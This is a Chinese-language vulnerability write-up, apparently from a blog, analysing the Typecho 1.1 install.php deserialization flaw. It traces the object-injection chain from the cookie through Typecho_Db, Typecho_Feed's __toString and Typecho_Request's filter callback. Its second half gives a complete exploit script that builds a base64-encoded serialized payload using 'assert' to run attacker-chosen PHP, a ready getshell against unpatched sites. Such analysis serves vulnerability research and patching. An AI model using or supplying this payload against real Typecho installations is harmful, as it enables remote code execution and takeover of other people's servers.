0x01 漏洞代码

install.php:

<?php

                    $config = unserialize(base64_decode(Typecho_Cookie::get('__typecho_config')));

                    Typecho_Cookie::delete('__typecho_config');

                    $db = new Typecho_Db($config['adapter'], $config['prefix']);

                    $db->addServer($config, Typecho_Db::READ | Typecho_Db::WRITE);

                    Typecho_Db::set($db);

                    ?>

执行到这里的条件:

跟进Typecho_Cookie::get('__typecho_config')   cookie.php 77-82行

    public static function get($key, $default = NULL)

    {

        $key = self::$_prefix . $key;

        $value = isset($_COOKIE[$key]) ? $_COOKIE[$key] : (isset($_POST[$key]) ? $_POST[$key] : $default);

        return is_array($value) ? $default : $value;

    }

$value赋值从$_COOKIE里或post中接收$key。

回到install.php:

install.php第232行:$db = new Typecho_Db($config['adapter'], $config['prefix']);,

这里, 跟进Typecho_Db, 有一行代码是:$adapterName = ‘Typecho_Db_Adapter_’ . $adapterName; 这里的$adapterName就对应着config里面的adapter,这里用了拼接操作,会触发类的toString方法。

Db.php:

   public function __construct($adapterName, $prefix = 'typecho_')

    {

        /** 获取适配器名称 */

        $this->_adapterName = $adapterName;

        /** 数据库适配器 */

        $adapterName = 'Typecho_Db_Adapter_' . $adapterName;

        if (!call_user_func(array($adapterName, 'isAvailable'))) {

            throw new Typecho_Db_Exception("Adapter {$adapterName} is not available");

        }

        $this->_prefix = $prefix;

        /** 初始化内部变量 */

        $this->_pool = array();

        $this->_connectedPool = array();

        $this->_config = array();

        //实例化适配器对象

        $this->_adapter = new $adapterName();

    }

查看后发现

Feed.php重写了__toString()方法

Feed.php  212-226 lines:

foreach ($this->_items as $item) {

                $content .= '<item rdf:about="' . $item['link'] . '">' . self::EOL;

                $content .= '<title>' . htmlspecialchars($item['title']) . '</title>' . self::EOL;

                $content .= '<link>' . $item['link'] . '</link>' . self::EOL;

                $content .= '<dc:date>' . $this->dateFormat($item['date']) . '</dc:date>' . self::EOL;

                $content .= '<description>' . strip_tags($item['content']) . '</description>' . self::EOL;

                if (!empty($item['suffix'])) {

                    $content .= $item['suffix'];

                }

                $content .= '</item>' . self::EOL;

                $links[] = $item['link'];

                if ($item['date'] > $lastUpdate) {

                    $lastUpdate = $item['date'];

                }

            }

调用了$item['author']->screenName$item$this->_items的foreach循环出来的,并且$this->_itemsTypecho_Feed类的一个private属性。

如果这里screenName属性不存在会调用__get()方法

Request.php:

    public function __get($key)

    {

        return $this->get($key);

    }

get():

检测$key是否在$this->_params[$key]这个数组里面,如果有的话将值赋值给$value

_applyFiter():

这里就很清楚明了了  两个回调后门 $filter$value可控

    private function _applyFilter($value)

    {

        if ($this->_filter) {

            foreach ($this->_filter as $filter) {

                $value = is_array($value) ? array_map($filter, $value) :

                call_user_func($filter, $value);

            }

            $this->_filter = array();

        }

        return $value;

    }

0x02 漏洞利用

exp:

<?php

class Typecho_Feed

{

    const RSS1 = 'RSS 1.0';

    const RSS2 = 'RSS 2.0';

    const ATOM1 = 'ATOM 1.0';

    const DATE_RFC822 = 'r';

    const DATE_W3CDTF = 'c';

    const EOL = "\n";

    private $_type;

    private $_items;

    public function __construct(){

        $this->_type = $this::RSS2;

        $this->_items[0] = array(

            'title' => '',

            'link' => '',

            'date' => 1508895132,

            'category' => array(new Typecho_Request()),

            'author' => new Typecho_Request(),

        );

    }

}

class Typecho_Request

{

    private $_params = array();

    private $_filter = array();

    public function __construct(){

        $this->_params['screenName'] = 'phpinfo()';

        $this->_filter[0] = 'assert';

    }

}

$exp = array(

    'adapter' => new Typecho_Feed(),

    'prefix' => 'typecho_'

);

echo base64_encode(serialize($exp));

代码审计-Typecho反序列化getshell的更多相关文章

  1. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  2. [php代码审计] Typecho 1.1 -反序列化Cookie数据进行前台Getshell

    环境搭建 源码下载:https://github.com/typecho/typecho/archive/v1.1-15.5.12-beta.zip 下载后部署到web根目录,然后进行安装即可,其中注 ...

  3. 【代码审计】后台Getshell的两种常规姿势

    0x00 前言 在早些年刚接触web安全的时候,基础套路都是找注入--找后台--找上传点--找数据库备份--Getshell,然而在代码审计的角度,也存在类似的基本操作. 这里结合代码实例介绍白盒Ge ...

  4. Typecho反序列化漏洞

    Typecho Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了命令执行,Typecho 1.1(15.5.12)之前的 ...

  5. Typecho 反序列化漏洞 分析及复现

    0x00 漏洞简介 CVE-2018-18753 漏洞概述: typecho 是一款非常简洁快速博客 CMS,前台 install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任 ...

  6. [代码审计]covercms 后台getshell

    0x00 环境介绍 CMS名称: covercms 运行环境: php 5.6.27-nts + apache + mysql 系统版本: 1.16 漏洞等级:高危 漏洞简介: 后台awnotas.i ...

  7. [代码审计]php反序列化漏洞

    0x01 php面向对象简介 对象:可以对其做事情的一些东西.一个对象有状态.行为和标识三种属性. 类:一个共享相同结构和行为的对象的集合. 每个类的定义都以关键字class开头,后面跟着类的名字. ...

  8. 2020/2/2 PHP代码审计之反序列化

    0x00 序列化与反序列化 序列化: serialize()把对象转换为字节序列的过程称为对象的序列化 反序列化: unserialize()把字节序列恢复为对象的过程称为对象的反序列化 0x01 序 ...

  9. 【实战】Weblogic反序列化Getshell

    修仙就是干,直接操作起来 1.访问http://x.x.x.x:7001/wls-wsat/CoordinatorPortType 2.加入Content-Type:text/xml 3.在body中 ...

随机推荐

  1. (十六)客户端验证与struts2中的服务器端验证

    一.客户端验证: 即用javaScript来验证. <%@ page language="java" contentType="text/html; charset ...

  2. (十三)使用handler实现登录验证

    一.Handel概念 J2EE Web 服务中的Handler技术特点非常像Servlet技术中的Filter.我们知道,在Servlet中,当一个HTTP到达服务端时,往往要经过多个Filter对请 ...

  3. Window环境下使用多个Git账号(github,gitee,gitlab,gogs等)

    个人电脑之前已经设置好github账号了,公司用的是gitlab私服,一直互不干扰,因为用的是不同的电脑,也就懒得配置git多账户环境.最近看了一下多年空空如也的码云,想着怎么的也会用到gitee来托 ...

  4. 十、es6之扩展运算符 三个点(...)

    对象的扩展运算符 对象中的扩展运算符(...)用于取出参数对象中的所有可遍历属性,拷贝到当前对象之中 let bar = { a: 1, b: 2 }; let baz = { ...bar }; / ...

  5. luogu题解 P2886 【牛继电器Cow Relays】-经过K边最短路&矩阵

    题目链接: https://www.luogu.org/problemnew/show/P2886 Update 6.16 最近看了下<算法导论>,惊奇地发现在在介绍\(APSP\) \( ...

  6. Go part 4 数据容器(数组,slice,string,map,syncMap,list)

    数组 数组是值类型,因此改变副本的值,不会影响到本身 数组的定义:var 变量名 [元素数量] T 变量名(符合标识符要求即可) 元素数量(整型,可以是const中的值) T(可以是任意基本类型,包括 ...

  7. Cryptography -- 密码学

    Introduction to Cryptography Cryptography enables you to store sensitive information or transmit it ...

  8. 简单实现app使用PC图片

    提一个很人性化的需求: 在自己的app里使用PC里的图片. 关键点:传输.怎么把图片从PC导入自己的APP. 因为iOS的封闭性,一般用户不能很方便把图片导入手机相册.笔者稍微想了下,实现功能其实也有 ...

  9. 【Distributed】分布式系统中遇到的问题

    一.概述  大型互联网公司公司一般都采用服务器集群,这样就要实现多个服务器之间的通讯,在nginx实现负载均衡(分布式解决方案)服务器集群会产生那些问题? 分布式锁(基本)单纯的Lock锁或者syn ...

  10. Windows下计算md5值

    目录 Windows下计算md5值 1.linux 下计算md5值 2.Windows下计算md5值 Windows下计算md5值 1.linux 下计算md5值 [root@master yl]# ...